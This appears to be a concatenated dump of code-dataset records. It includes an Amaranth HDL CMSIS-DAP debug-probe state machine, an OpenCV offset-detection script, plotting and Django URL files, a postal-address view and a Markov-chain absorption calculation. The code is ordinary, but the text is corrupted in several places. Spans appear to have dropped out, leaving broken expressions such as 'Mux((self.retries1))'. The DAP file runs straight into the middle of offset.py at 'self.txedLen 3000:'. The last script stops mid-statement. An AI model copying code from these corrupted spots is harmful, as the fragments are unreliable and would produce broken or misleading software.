------------------------------------------\n m.next = 'UPLOAD_RXED_DATA'\n m.d.sync += [\n self.txb.eq(0),\n self.txedLen.eq((self.tfrram.adr*4)+3) # Record length of data to be returned\n ]\n\n # -------------------------------------------------------------------------------------\n # -------------------------------------------------------------------------------------\n def RESP_TransferBlock_Setup(self, m):\n # n x [ ])\n # Triggered at start of a TransferBlock data sequence\n # We have the command, index and transfer count, need to set up to get the transfers\n\n m.d.sync += [\n self.tfrram.adr.eq(0),\n self.dbgif.command.eq(CMD_TRANSACT),\n self.retries.eq(0),\n\n # DAP Index is 1 byte in\n self.dapIndex.eq(self.rxBlock.bit_select(8,8)),\n\n # Transfer count is 2 bytes in\n self.transferCount.eq(self.rxBlock.bit_select(16,16)),\n\n # Transfer Req is 4 bytes in\n self.dbgif.apndp.eq(self.rxBlock.bit_select(32,1)),\n self.dbgif.rnw.eq(self.rxBlock.bit_select(33,1)),\n self.dbgif.addr32.eq(self.rxBlock.bit_select(34,2)),\n\n # Set to one the number of responses sent back\n self.txBlock.bit_select(8,16).eq(C(1,16)),\n\n # Decide which state to jump to depending on if we have data\n self.txb.eq(Mux(self.rxBlock.bit_select(33,1),4,0)),\n\n # ...and start the retries counter for this first entry\n self.retries.eq(0)\n ]\n\n # Filter for case someone tries to send us no transfers to perform\n # in which case we send back a good ack!\n with m.If(self.rxBlock.bit_select(16,16)):\n m.next = 'DAP_TransferBlock_PROCESS'\n with m.Else():\n m.d.sync += [\n self.txBlock.bit_select(8,24).eq(C(1,24)),\n self.txLen.eq(4)\n ]\n m.next = 'RESPOND'\n\n def RESP_TransferBlock_Process(self, m):\n m.d.comb += self.tfrram.dat_w.eq(self.dbgif.dread)\n\n # By default we don't want to receive any more stream data, we're not writing to the ram\n # and it's not the end of a packet\n m.d.sync += self.busy.eq(1)\n\n with m.Switch(self.txb):\n with m.Case(0,1,2,3): # Collect the 32 bit transfer Data to go with the command ----------------------------\n with m.If(self.streamOut.ready & self.streamOut.valid):\n m.d.sync+=[\n self.tfrData.word_select(self.txb,8).eq(self.streamOut.payload),\n self.txb.eq(self.txb+1),\n ]\n with m.Else():\n m.d.sync 
+=self.busy.eq(0)\n\n with m.Case(4): # We have the command and any needed data, action it ---------------------------------------\n m.d.sync += [\n self.dbgif.dwrite.eq(self.tfrData),\n self.dbgif.go.eq(1),\n self.retries.eq(self.retries+1),\n self.txb.eq(5)\n ]\n\n with m.Case(5): # Wait for command to be accepted ----------------------------------------------------------\n with m.If(self.dbg_done==0):\n m.d.sync += self.dbgif.go.eq(0)\n m.d.sync += self.txb.eq(6)\n\n with m.Case(6): # We sent a command, wait for it to start being executed -----------------------------------\n with m.If(self.dbg_done==1):\n # Write return value from this command into return frame\n m.d.sync += self.txBlock.bit_select(24,8).eq(Cat(self.dbgif.ack, self.dbgif.perr))\n\n # Now lets figure out how to handle this response\n\n # If we're to retry, then let's do it\n with m.If(self.dbgif.ack==0b010):\n m.d.sync += self.txb.eq(Mux((self.retries1)):\n m.d.sync += [\n self.retries.eq(0),\n self.txBlock.bit_select(8,16).eq(self.txBlock.bit_select(8,16)+1),\n self.txb.eq(Mux(self.dbgif.rnw,4,0))\n ]\n\n with m.Else():\n with m.If(self.dbgif.postedMode):\n # Debug interface is in posting mode, better do one more read to collect the data\n m.d.sync += [\n self.dbgif.rnw.eq(1), # Read RDBUFF\n self.retries.eq(0),\n self.dbgif.apndp.eq(0),\n self.dbgif.addr32.eq(3),\n self.txb.eq(4)\n ]\n with m.Else():\n # Otherwise lets wrap up\n m.d.sync += [\n # Only need to increment transfer count ram position if this was a read\n #self.transferCount.eq(self.tfrram.adr+self.dbgif.rnw),\n #self.tfrram.adr.eq(0),\n self.txb.eq(7)\n ]\n\n with m.Case(7,8,9,10): # Transfer completed, start sending data back ---------------------------------------\n with m.If(self.streamIn.ready):\n m.d.sync += [\n self.streamIn.payload.eq(self.txBlock.word_select(self.txb-7,8)),\n self.streamIn.valid.eq(1),\n self.txb.eq(self.txb+1),\n # End of transfer if there are no data to return\n self.streamIn.last.eq(self.isV2 & (self.txb==10) & (self.dbgif.rnw==0))\n ]\n\n with m.Case(11): # Initial data sent, decide what to do next ----------------------------------------------\n m.d.sync += [\n self.txb.eq(0),\n self.txedLen.eq((self.tfrram.adr*4)+4) # Record length of data that will be returned\n ]\n m.next = 'UPLOAD_RXED_DATA'\n\n def RESP_Transfer_Complete(self, m):\n # Complete the process of returning data collected via either Transfer_Process or\n # TransferBlock_Process. 
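Both transfer FSMs above hand completed words back one byte at a time with `word_select(n, 8)` for n = 0..3, so each 32-bit word leaves the device least-significant byte first. A small host-side model of that serialization (the helper name is made up for illustration):

```python
# Host-side model of the byte order produced by dat_r.word_select(n, 8):
# each 32-bit word is emitted least-significant byte first.
def words_to_bytes(words):
    out = bytearray()
    for w in words:
        for shift in (0, 8, 16, 24):   # LSB first, as word_select(0..3, 8)
            out.append((w >> shift) & 0xFF)
    return bytes(out)

assert words_to_bytes([0x11223344]) == b"\x44\x33\x22\x11"
```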
Data count to be transferred is in self.transferCount and\n # the payload is in the tfrram.\n\n m.d.sync += self.busy.eq(1)\n\n with m.Switch(self.txb):\n with m.Case(0): # Prepare transfer ------------------------------------------------------------------------\n with m.If(self.tfrram.adr!=0):\n m.d.sync += [\n self.transferCount.eq(self.tfrram.adr),\n self.tfrram.adr.eq(0),\n self.txb.eq(1)\n ]\n with m.Else():\n m.d.sync += self.txb.eq(7)\n\n with m.Case(1): # Wait for ram to propagate through -------------------------------------------------------\n m.d.sync += self.txb.eq(2)\n\n with m.Case(2): # Collect transfer value from RAM store ---------------------------------------------------\n m.d.sync += [\n self.transferCount.eq(self.transferCount-1),\n self.streamIn.payload.eq(self.tfrram.dat_r.word_select(0,8)),\n self.txb.eq(3)\n ]\n\n with m.Case(3,4,5,6): # Send 32 bit value to outgoing stream -------------------------------------------\n m.d.sync += self.streamIn.valid.eq(1)\n with m.If(self.streamIn.ready & self.streamIn.valid):\n m.d.sync += [\n self.txb.eq(self.txb+1),\n self.streamIn.payload.eq(self.tfrram.dat_r.word_select(self.txb-2,8)),\n # 5 because of pipeline\n self.streamIn.last.eq(self.isV2 & (self.transferCount==0) & (self.txb==5)),\n self.streamIn.valid.eq(self.txb!=6)\n ]\n\n with m.Case(7): # Finished this send ---------------------------------------------------------------------\n with m.If(self.streamIn.ready):\n with m.If(self.transferCount==0):\n with (m.If(self.isV2)):# | (self.txedLen==DAP_V1_MAX_PACKET_SIZE))):\n m.next = 'IDLE'\n with m.Else():\n m.next = 'V1PACKETFILL'\n with m.Else():\n m.d.sync += [\n self.txb.eq(1),\n self.tfrram.adr.eq(self.tfrram.adr+1)\n ]\n\n # -------------------------------------------------------------------------------------\n # -------------------------------------------------------------------------------------\n def RESP_JTAG_Sequence_Setup(self,m):\n # Triggered at the start of a RESP JTAG Sequence\n # There are data to receive at this point, and potentially bytes to transmit\n\n # Collect how many sequences we'll be processing, then move to get the first one\n m.d.sync += [\n self.seqCount.eq(self.rxBlock.word_select(1,8)),\n\n # Setup to have control over tms, tdi and swwr (set for output), with clocks of 1 clock cycle\n self.dbgif.dwrite.eq(0),\n\n # Just for now take over reset as well\n self.dbgif.pinsin.eq(0b0001_0111_0001_0000),\n self.dbgif.command.eq(CMD_PINS_WRITE),\n self.txb.eq(0)\n ]\n m.next = 'DAP_JTAG_Sequence_PROCESS'\n\n\n def RESP_JTAG_Sequence_PROCESS(self,m):\n m.d.sync += [\n self.busy.eq(1),\n self.streamIn.valid.eq(0)\n ]\n\n\n m.d.sync += self.can.eq(0)\n\n with m.Switch(self.txb):\n\n # -------------- # Send frontmatter\n with m.Case(0):\n with m.If(self.streamIn.ready):\n m.d.sync += [\n # Send frontmatter for reponse\n self.streamIn.payload.eq(DAP_JTAG_Sequence),\n self.streamIn.last.eq(0),\n self.streamIn.valid.eq(1),\n\n # This is the 'OK' that will be sent out next\n self.pendingTx.eq(0),\n\n # If there's nothing to be done then we are finished, otherwise start\n self.txb.eq(Mux(self.seqCount!=0,1,7))\n ]\n\n # --------------\n with m.Case(1): # Get info for this sequence\n with m.If(self.streamOut.ready & self.streamOut.valid):\n m.d.sync += [\n self.seqCount.eq(self.seqCount-1),\n self.tckCycles.eq(self.streamOut.payload.bit_select(0,6)),\n\n # Set the TMS bit\n self.dbgif.pinsin.bit_select(1,1).eq(self.streamOut.payload.bit_select(6,1)),\n\n # ...and decide if we want to capture what comes 
back\n self.tdotgt.eq(Mux(self.streamOut.payload.bit_select(7,1),\n Mux(self.streamOut.payload.bit_select(0,6),self.streamOut.payload.bit_select(0,6),0x40),0)),\n\n self.txb.eq(2)\n ]\n with m.Else():\n m.d.sync += self.busy.eq(0)\n\n # --------------\n with m.Case(2): # Waiting for TDI byte to arrive\n with m.If(self.streamOut.ready & self.streamOut.valid):\n m.d.sync += [\n self.tdiData.eq(self.streamOut.payload),\n self.tdiCount.eq(0),\n\n self.txb.eq(3)\n ]\n with m.Else():\n m.d.sync += self.busy.eq(0)\n\n # --------------\n with m.Case(3): # Setup for clocking out TDI, TCK->0\n m.d.sync += [\n # Put this bit ready to output\n self.dbgif.pinsin.bit_select(2,1).eq(self.tdiData.bit_select(self.tdiCount,1)),\n self.dbgif.pinsin.bit_select(0,1).eq(0),\n self.dbgif.go.eq(1),\n\n self.txb.eq(4)\n ]\n\n # -------------\n with m.Case(4): # Waiting until we can set TCK->1\n with m.If(self.dbg_done==0):\n m.d.sync += self.dbgif.go.eq(0)\n with m.If ((self.dbgif.go==0) & (self.dbg_done==1)):\n m.d.sync += [\n # Bit is established, change the clock\n self.dbgif.pinsin.bit_select(0,1).eq(1),\n self.dbgif.go.eq(1),\n\n self.txb.eq(5)\n ]\n\n # -------------\n with m.Case(5): # Sent this bit, waiting for clock 1 to complete\n with m.If(self.dbg_done==0):\n m.d.sync += self.dbgif.go.eq(0)\n with m.If ((self.dbgif.go==0) & (self.dbg_done==1)):\n m.d.sync += [\n # Adjust all the pointers\n self.tckCycles.eq(self.tckCycles-1),\n self.tdiCount.eq(self.tdiCount+1),\n\n self.txb.eq(6)\n ]\n\n # If there is a capture in process then do it\n with m.If(self.tdotgt):\n m.d.sync += [\n self.can.eq(self.dbgif.pinsout.bit_select(3,1)),\n self.tdoBuild.bit_select(self.tdoCount,1).eq(self.dbgif.pinsout.bit_select(3,1)),\n self.tdoCount.eq(self.tdoCount+1),\n self.tdotgt.eq(self.tdotgt-1)\n ]\n\n # -------------\n with m.Case(6): # ...if this capture is complete then send it back, then decide if there is still work to be done\n with m.If(((self.tdotgt==0) & (self.tdoCount!=0)) | (self.tdoCount==8)):\n with m.If(self.streamIn.ready):\n m.d.sync += [\n self.streamIn.payload.eq(self.pendingTx),\n self.streamIn.valid.eq(1),\n self.pendingTx.eq(self.tdoBuild),\n self.tdoCount.eq(0),\n self.tdoBuild.eq(0)\n ]\n with m.Else():\n with m.If(self.tckCycles==0):\n # This is the last bit of the sequence, go get the next, or finish\n m.d.sync += self.txb.eq(Mux(self.seqCount,1,7))\n with m.Else():\n # otherwise set up the next bit to clock out, or a new byte\n m.d.sync += self.txb.eq(Mux(self.tdiCount==8,2,3))\n\n # -------------\n with m.Case(7): # Send the final byte, with last set\n with m.If(self.streamIn.ready):\n m.d.sync += [\n self.streamIn.payload.eq(self.pendingTx),\n self.streamIn.last.eq(1),\n self.streamIn.valid.eq(1)\n ]\n m.next = 'IDLE'\n\n\n # -------------------------------------------------------------------------------------\n\n def elaborate(self,platform):\n done_cdc = Signal(2)\n self.dbg_done = Signal()\n\n m = Module()\n # Reset everything before we start\n\n m.d.sync += self.streamIn.valid.eq(0)\n m.d.comb += self.streamOut.ready.eq(~self.busy)\n\n m.submodules.tfrram = self.tfrram = WideRam()\n\n m.submodules.dbgif = self.dbgif = DBGIF(self.dbgpins)\n\n # Organise the CDC from the debug interface\n m.d.sync += done_cdc.eq(Cat(done_cdc[1],self.dbgif.done))\n m.d.comb += self.dbg_done.eq(done_cdc==0b11)\n\n # Latch the read data at the rising edge of done signal\n m.d.comb += self.tfrram.we.eq(done_cdc==0b10)\n\n with m.FSM(domain=\"sync\") as decoder:\n with m.State('IDLE'):\n m.d.sync += [ 
self.txedLen.eq(0), self.busy.eq(0) ]\n\n # Only process if this is the start of a packet (i.e. it's not overrrun or similar)\n with m.If(self.streamOut.valid & self.streamOut.ready & self.streamOut.first):\n m.next = 'ProtocolError'\n m.d.sync += self.rxedLen.eq(1)\n m.d.sync += self.rxBlock.word_select(0,8).eq(self.streamOut.payload)\n\n # Default return is packet name followed by 0 (no error)\n m.d.sync += self.txBlock.word_select(0,16).eq(Cat(self.streamOut.payload,C(0,8)))\n m.d.sync += self.txLen.eq(2)\n\n with m.Switch(self.streamOut.payload):\n with m.Case(DAP_Disconnect, DAP_ResetTarget, DAP_SWO_Status, DAP_TransferAbort):\n m.d.sync+= [ self.rxLen.eq(1), self.busy.eq(1) ]\n # This still goes to RxParams as a common entry, but then it dispatches immediately\n # from there as there are no params to rx\n m.next='RxParams'\n\n with m.Case(DAP_Info, DAP_Connect, DAP_SWD_Configure, DAP_SWO_Transport, DAP_SWJ_Sequence,\n DAP_SWO_Mode, DAP_SWO_Control, DAP_SWO_ExtendedStatus, DAP_JTAG_IDCODE, DAP_JTAG_Sequence):\n m.d.sync+=self.rxLen.eq(2)\n with m.If(~self.streamOut.last):\n m.next = 'RxParams'\n\n with m.Case(DAP_HostStatus, DAP_SWO_Data, DAP_Delay, DAP_JTAG_Configure, DAP_Transfer):\n m.d.sync+=self.rxLen.eq(3)\n with m.If(~self.streamOut.last):\n m.next = 'RxParams'\n\n with m.Case(DAP_SWO_Baudrate, DAP_SWJ_Clock, DAP_TransferBlock):\n m.d.sync+=self.rxLen.eq(5)\n with m.If(~self.streamOut.last):\n m.next = 'RxParams'\n\n with m.Case(DAP_WriteABORT, DAP_TransferConfigure):\n m.d.sync+=self.rxLen.eq(6)\n with m.If(~self.streamOut.last):\n m.next = 'RxParams'\n\n with m.Case(DAP_SWJ_Pins):\n m.d.sync+=self.rxLen.eq(7)\n with m.If(~self.streamOut.last):\n m.next = 'RxParams'\n\n with m.Case(DAP_SWD_Sequence):\n with m.If(~self.streamOut.last):\n m.next = 'DAP_SWD_Sequence_GetCount'\n\n with m.Case(DAP_ExecuteCommands):\n with m.If(~self.streamOut.last):\n m.next = 'DAP_ExecuteCommands_GetNum'\n\n with m.Case(DAP_QueueCommands):\n\n with m.If(~self.streamOut.last):\n m.next = 'DAP_QueueCommands_GetNum'\n\n with m.Default():\n self.RESP_Invalid(m)\n\n #########################################################################################\n\n with m.State('RESPOND'):\n with m.If(self.txedLen 3000:\r\n cv2.drawContours(img_contours[i], contours, int(contourIndex[j]), (0,255,255), 3)\r\n cv2.drawContours(img_contours[i], [box], 0, (0,255,255), 3)\r\n isOffset = 1\r\n \r\n img_contours[i] = cv2.resize(img_contours [i], (int(img_contours[i].shape[1] /3), int(img_contours[i].shape[0]/3)))\r\n #print(i, \" :\", perimeter)\r\n cv2.imshow(\"a\",img_contours[i])\r\n cv2.waitKey()\r\n\r\n return isOffset\r\n \r\nprint(getOffset(cv2.imread(\"1_offset.PNG\")))\r\n\r\n\r\n #area_feature.append(max(area))\r\n #perimeter_feature = []\r\n #circularity_feature = []\r\n #hasHole_feature = []\r\n #elongation_feature = []\r\n #print(\"area: \", max(area))\r\n #print(\"perimeter: \", perimeter)\r\n #print(\"circularity: \", circularity)\r\n\r\ntesting = 1\r\nif not testing:\r\n\r\n plt.subplot(4,2,1),plt.imshow(green[0])\r\n plt.subplot(4,2,2),plt.imshow(green_eq[0])\r\n\r\n plt.subplot(4,2,3),plt.imshow(green[1])\r\n plt.subplot(4,2,4),plt.imshow(green_eq[1])\r\n\r\n plt.subplot(4,2,5),plt.imshow(green[2])\r\n plt.subplot(4,2,6),plt.imshow(green_eq[2])\r\n\r\n plt.subplot(4,2,7),plt.imshow(green[3])\r\n plt.subplot(4,2,8),plt.imshow(green_eq[3])\r\n\r\n plt.show()\r\n\r\n plt.subplot(4,3,1),plt.imshow(thresh[0])\r\n plt.subplot(4,3,2),plt.imshow(thresh_eq[0])\r\n 
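The feature block commented out in offset.py above names circularity alongside area and perimeter, but never computes it. If it is ever needed, the usual definition is 4·pi·area / perimeter², which is 1.0 for a perfect circle and falls toward 0 for elongated contours; a sketch using the same OpenCV calls the script already relies on:

```python
# Sketch of the circularity feature named but not computed in offset.py:
# 4*pi*A / P**2 is 1.0 for a circle and smaller for stretched shapes.
import cv2
import numpy as np

def circularity(contour):
    area = cv2.contourArea(contour)
    perimeter = cv2.arcLength(contour, True)
    if perimeter == 0:
        return 0.0  # degenerate contour
    return 4.0 * np.pi * area / perimeter ** 2
```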
plt.subplot(4,3,3),plt.imshow(images[0])\r\n\r\n plt.subplot(4,3,4),plt.imshow(thresh[1])\r\n plt.subplot(4,3,5),plt.imshow(thresh_eq[1])\r\n plt.subplot(4,3,6),plt.imshow(images[1])\r\n\r\n plt.subplot(4,3,7),plt.imshow(thresh[2])\r\n plt.subplot(4,3,8),plt.imshow(thresh_eq[2])\r\n plt.subplot(4,3,9),plt.imshow(images[2])\r\n\r\n plt.subplot(4,3,10),plt.imshow(thresh[3])\r\n plt.subplot(4,3,11),plt.imshow(thresh_eq[3])\r\n plt.subplot(4,3,12),plt.imshow(images[3])\r\n\r\n plt.show()\r\n\r\n plt.subplot(4,3,1),plt.imshow(morph_open[0])\r\n plt.subplot(4,3,2),plt.imshow(morph_close[0])\r\n plt.subplot(4,3,3),plt.imshow(images[0])\r\n\r\n plt.subplot(4,3,4),plt.imshow(morph_open[1])\r\n plt.subplot(4,3,5),plt.imshow(morph_close[1])\r\n plt.subplot(4,3,6),plt.imshow(images[1])\r\n\r\n plt.subplot(4,3,7),plt.imshow(morph_open[2])\r\n plt.subplot(4,3,8),plt.imshow(morph_close[2])\r\n plt.subplot(4,3,9),plt.imshow(images[2])\r\n\r\n plt.subplot(4,3,10),plt.imshow(morph_open[3])\r\n plt.subplot(4,3,11),plt.imshow(morph_close[3])\r\n plt.subplot(4,3,12),plt.imshow(images[3])\r\n\r\n plt.show()\r\n\r\n\r\n\r\n\r\n\r\n\r\n plt.subplot(3,2,1),plt.imshow(green[4])\r\n plt.subplot(3,2,2),plt.imshow(green_eq[4])\r\n\r\n plt.subplot(3,2,3),plt.imshow(green[5])\r\n plt.subplot(3,2,4),plt.imshow(green_eq[5])\r\n\r\n plt.subplot(3,2,5),plt.imshow(green[6])\r\n plt.subplot(3,2,6),plt.imshow(green_eq[6])\r\n\r\n plt.show()\r\n\r\n plt.subplot(3,3,1),plt.imshow(thresh[4])\r\n plt.subplot(3,3,2),plt.imshow(thresh_eq[4])\r\n plt.subplot(3,3,3),plt.imshow(images[4])\r\n\r\n plt.subplot(3,3,4),plt.imshow(thresh[5])\r\n plt.subplot(3,3,5),plt.imshow(thresh_eq[5])\r\n plt.subplot(3,3,6),plt.imshow(images[5])\r\n\r\n plt.subplot(3,3,7),plt.imshow(thresh[6])\r\n plt.subplot(3,3,8),plt.imshow(thresh_eq[6])\r\n plt.subplot(3,3,9),plt.imshow(images[6])\r\n\r\n\r\n plt.show()\r\n\r\n plt.subplot(3,3,1),plt.imshow(morph_open[4])\r\n plt.subplot(3,3,2),plt.imshow(morph_close[4])\r\n plt.subplot(3,3,3),plt.imshow(images[4])\r\n\r\n plt.subplot(3,3,4),plt.imshow(morph_open[5])\r\n plt.subplot(3,3,5),plt.imshow(morph_close[5])\r\n plt.subplot(3,3,6),plt.imshow(images[5])\r\n\r\n plt.subplot(3,3,7),plt.imshow(morph_open[6])\r\n plt.subplot(3,3,8),plt.imshow(morph_close[6])\r\n plt.subplot(3,3,9),plt.imshow(images[6])\r\n\r\n plt.show()\r\n\r\n plt.subplot(4,2,1),plt.imshow(img_contours[0])\r\n plt.subplot(4,2,2),plt.imshow(img_contours[1])\r\n plt.subplot(4,2,3),plt.imshow(img_contours[2])\r\n plt.subplot(4,2,4),plt.imshow(img_contours[3])\r\n plt.subplot(4,2,5),plt.imshow(img_contours[4])\r\n plt.subplot(4,2,6),plt.imshow(img_contours[5])\r\n plt.subplot(4,2,7),plt.imshow(img_contours[6])\r\n\r\n plt.show()\r\n","sub_path":"Offset/offset.py","file_name":"offset.py","file_ext":"py","file_size_in_byte":6293,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"149121381","text":"import numpy as np\nimport matplotlib\nimport matplotlib.pyplot as plt\n\n# set up matplotlib\nis_ipython = 'inline' in matplotlib.get_backend()\nif is_ipython:\n from IPython import display\n\n\ndef show_screen(screen, name):\n plt.figure(2)\n plt.imshow(screen.cpu().squeeze(0).permute(1, 2, 0).numpy(),\n interpolation='none')\n plt.title(name)\n plt.show()\n\ndef moving_average(x, w):\n return np.convolve(x, np.ones(w), 'valid') / w\n\n\ndef plot_scores(episode_scores, map_name=\"scores\"):\n plt.figure(1)\n plt.clf()\n # scores_t = torch.tensor(episode_scores, dtype=torch.float)\n plt.title('Training 
{}...'.format(map_name))\n    plt.xlabel('Episode')\n    plt.ylabel('Score')\n    plt.plot(moving_average(episode_scores, 2))\n    plt.plot(moving_average(episode_scores, 20))\n\n    plt.pause(0.001)  # pause a bit so that plots are updated\n    if is_ipython:\n        display.clear_output(wait=True)\n        display.display(plt.gcf()) \n\n","sub_path":"plot.py","file_name":"plot.py","file_ext":"py","file_size_in_byte":978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"189573176","text":"from django.contrib.auth import views as auth_views\nfrom django.urls import path, re_path, include\nfrom . import views\n\nfrom users.forms import RegisterUserForm, ContinueAsGuestForm\nfrom users.views import (\n    AuthFormsView,\n    LoginView,\n    LogoutView,\n    # PasswordChangeView,\n    # PasswordResetRequestView,\n)\nfrom users.views import anonymous_required\n\n\nurlpatterns = [\n    # path(\n    #     \"password/reset/\",\n    #     PasswordResetRequestView.as_view(),\n    #     name=\"password-reset-request\",\n    # ),\n    # path(\"login/\", LoginView.as_view(), name=\"login\"),\n    path(\n        \"register/\",\n        anonymous_required(AuthFormsView.as_view(form_class=RegisterUserForm)),\n        name=\"register\",\n    ),\n    path(\n        \"continue/\",\n        anonymous_required(AuthFormsView.as_view(form_class=ContinueAsGuestForm)),\n        name=\"continue-as-guest\",\n    ),\n    path(\"logout/\", LogoutView.as_view(), name=\"logout\"),\n    #path(\"password/change/\", PasswordChangeView.as_view(), name=\"password-change\"),\n    path(\n        \"login/\",\n        auth_views.LoginView.as_view(redirect_authenticated_user=True),\n        name=\"login\",\n    ),\n    #path(\"logout/\", auth_views.LogoutView.as_view(), name=\"logout\"),\n    # path(\"register/\", views.Register.as_view(), name=\"register\"),\n    path(\"profile/\", views.profile, name=\"profile\"),\n    path(\"\", include(\"django.contrib.auth.urls\")),\n]\n","sub_path":"django_shop/users/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":1387,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"406203062","text":"# -*- coding: utf-8 -*-\nfrom django.conf.urls import url\nfrom harbin import views\nfrom django.views.generic import TemplateView\n\nurlpatterns = [ \n    #url(r'^market.html$', TemplateView.as_view(template_name=\"market/market.html\")),\n    \n\n    # for testing\n    url(r'test$',views.test, name='test'),\n\n    # harbin API endpoints\n    url(r'get_split$',views.get_split, name='get_split'),\n    url(r'get_lexical$',views.get_lexical, name='get_lexical'),\n    url(r'get_dependency$',views.get_dependency, name='get_dependency'),\n    url(r'get_mark$',views.get_mark, name='get_mark'),\n]\n","sub_path":"harbin/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":567,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"23601662","text":"from Block import *\n\nclass TestMine():\n    def __init__(self, previousHash, data, difficulty):\n        self.difficulty = difficulty\n        b=Block(previousHash,data)\n        newBlock=b.mineBlock(difficulty)\n        print(\"start:\"+newBlock.bHash+\":end\")\n\n\n# The original call passed a single positional argument, which raises TypeError;\n# placeholder hash/data values are assumed here so the arity matches __init__.\ntm = TestMine('0', 'test data', 3)\n","sub_path":"testMine.py","file_name":"testMine.py","file_ext":"py","file_size_in_byte":274,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"5065073","text":"from django.http import HttpResponse\nfrom django.template import RequestContext\nfrom django.template.loader import render_to_string\ntry:\n    from django.utils import simplejson\nexcept ImportError:\n    import json as simplejson\nfrom 
postal.library import form_factory\nfrom postal.settings import POSTAL_USE_CRISPY_FORMS\n\n\ndef address_inline(request, prefix=\"\", country_code=None, template_name=\"postal/form.html\"):\n \"\"\" Displays postal address with localized fields \"\"\"\n country_prefix = \"country\"\n prefix = request.POST.get('prefix', prefix)\n\n if prefix:\n country_prefix = prefix + '-country'\n country_code = request.POST.get(country_prefix, country_code)\n postal_form_id = request.POST.get('postal-form-id', 'postal-address-form')\n\n form_class = form_factory(country_code=country_code)\n\n if request.method == \"POST\":\n data = {}\n for (key, val) in request.POST.items():\n if val is not None and len(val) > 0:\n data[key] = val\n data.update({country_prefix: country_code})\n\n form = form_class(prefix=prefix, initial=data, postal_form_id=postal_form_id)\n else:\n form = form_class(prefix=prefix, postal_form_id=postal_form_id)\n\n return render_to_string(\n template_name,\n context={\n \"form\": form,\n \"prefix\": prefix,\n },\n request=request\n )\n\n\ndef changed_country(request):\n if POSTAL_USE_CRISPY_FORMS:\n result = simplejson.dumps({\n \"postal_address\": address_inline(request, template_name=\"postal/crispyform.html\")\n })\n else:\n result = simplejson.dumps({\n \"postal_address\": address_inline(request),\n })\n return HttpResponse(result)","sub_path":"src/postal/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1733,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"11"} +{"seq_id":"397963574","text":"#%% Packages\n\n\nimport gc\nimport os\nimport pickle\n\nimport numpy as np\nfrom scipy.sparse import csc_matrix, dok_matrix, identity\nfrom scipy.special import comb\n\nfrom homeostatic.definitions import (\n absorption_matrix,\n birth_diagonal_matrices,\n death_diagonal_matrices,\n)\n\n#%% Parameters\n\n\nmu_value = 1.0\nn_mean_value = 10\ngamma_value = 1.0\nbase_stimulus = 10\nstimulus_value = [\n base_stimulus * gamma_value,\n base_stimulus * gamma_value,\n base_stimulus * gamma_value,\n]\n\n#%% Calculating distributions\n\n\nfor new_clone_is_soft in [True, False]:\n for sample_value in range(4):\n\n # Reading Samples and Variables\n\n probability_values = np.genfromtxt(\n f\"Samples/Matrices/Matrix-{sample_value}.csv\", delimiter=\",\"\n )\n dimension_value = probability_values.shape[0]\n\n if sample_value < 3:\n if new_clone_is_soft:\n nu_value = np.genfromtxt(\n \"Samples/Nu-Matrices/Nu-Matrix-Soft.csv\", delimiter=\",\"\n )\n else:\n nu_value = np.genfromtxt(\n \"Samples/Nu-Matrices/Nu-Matrix-Hard.csv\", delimiter=\",\"\n )\n else:\n if new_clone_is_soft:\n nu_value = np.genfromtxt(\n \"Samples/Nu-Matrices/Nu-Matrix-Soft-(D).csv\", delimiter=\",\"\n )\n else:\n nu_value = np.genfromtxt(\n \"Samples/Nu-Matrices/Nu-Matrix-Hard-(D).csv\", delimiter=\",\"\n )\n nu_value = nu_value * n_mean_value\n\n with open(\"Results/QSD/Truncated_levels.bin\", \"rb\") as file:\n truncated_levels = np.array(pickle.load(file))\n\n niche = 0\n if new_clone_is_soft:\n niche = 1\n max_level_value = (\n max(\n [\n max(truncated_levels[niche, :, i])\n for i in range(truncated_levels.shape[2])\n ]\n )\n + 15\n )\n\n # Solving matrix equations\n\n b_matrices = [] # Lis of upper diagonal (birth) matrices\n d_matrices = [] # List of lower diagonal (death) matrices\n a_matrices = [[] for _ in range(dimension_value)] # List of absorption matrices\n distribution = [\n [] for _ in range(dimension_value)\n ] # Distribution of absorption matrices\n\n # 
Calculating upper diagonal (birth) matrices\n\n for level_value in range(dimension_value, max_level_value):\n b_matrices.append(\n birth_diagonal_matrices(\n level_value,\n dimension_value,\n probability_values,\n stimulus_value,\n mu_value,\n nu_value,\n )\n )\n\n # Calculating lower diagonal (death) matrices\n\n for level_value in range(dimension_value + 1, max_level_value + 1):\n d_matrices.append(\n death_diagonal_matrices(\n level_value,\n max_level_value,\n dimension_value,\n probability_values,\n stimulus_value,\n mu_value,\n nu_value,\n )\n )\n\n # Calculating absorption matrices, all zero matrices are stored too\n\n for clone_number in range(dimension_value):\n for absorbing_level_value in range(dimension_value - 1, max_level_value):\n block_column = []\n for level_value in range(dimension_value, max_level_value + 1):\n if absorbing_level_value != level_value - 1:\n block_column.append(\n dok_matrix(\n (\n int(comb(level_value - 1, dimension_value - 1)),\n int(\n comb(\n absorbing_level_value - 1,\n dimension_value - 2,\n )\n ),\n )\n ).tocsc()\n )\n else:\n block_column.append(\n absorption_matrix(\n level_value,\n clone_number,\n max_level_value,\n dimension_value,\n mu_value,\n nu_value,\n probability_values,\n stimulus_value,\n )\n )\n a_matrices[clone_number].append(block_column)\n\n # Calculating the inverses of H matrices, and storing them in inverse order\n\n h_matrices = [identity(d_matrices[-1].shape[0], format=\"csc\")]\n\n for level_order in range(len(d_matrices)):\n gc.collect()\n matrix = identity(\n b_matrices[-(level_order + 1)].shape[0], format=\"csc\"\n ) - b_matrices[-(level_order + 1)].dot(\n h_matrices[-1].dot(d_matrices[-(level_order + 1)])\n )\n matrix = np.linalg.inv(matrix.todense())\n h_matrices.append(csc_matrix(matrix))\n\n for clone_number in range(dimension_value):\n for column_number in range(len(a_matrices[clone_number])):\n # Calculating K matrices for the *column_number* column, and storing them in inverse order\n k_matrices = 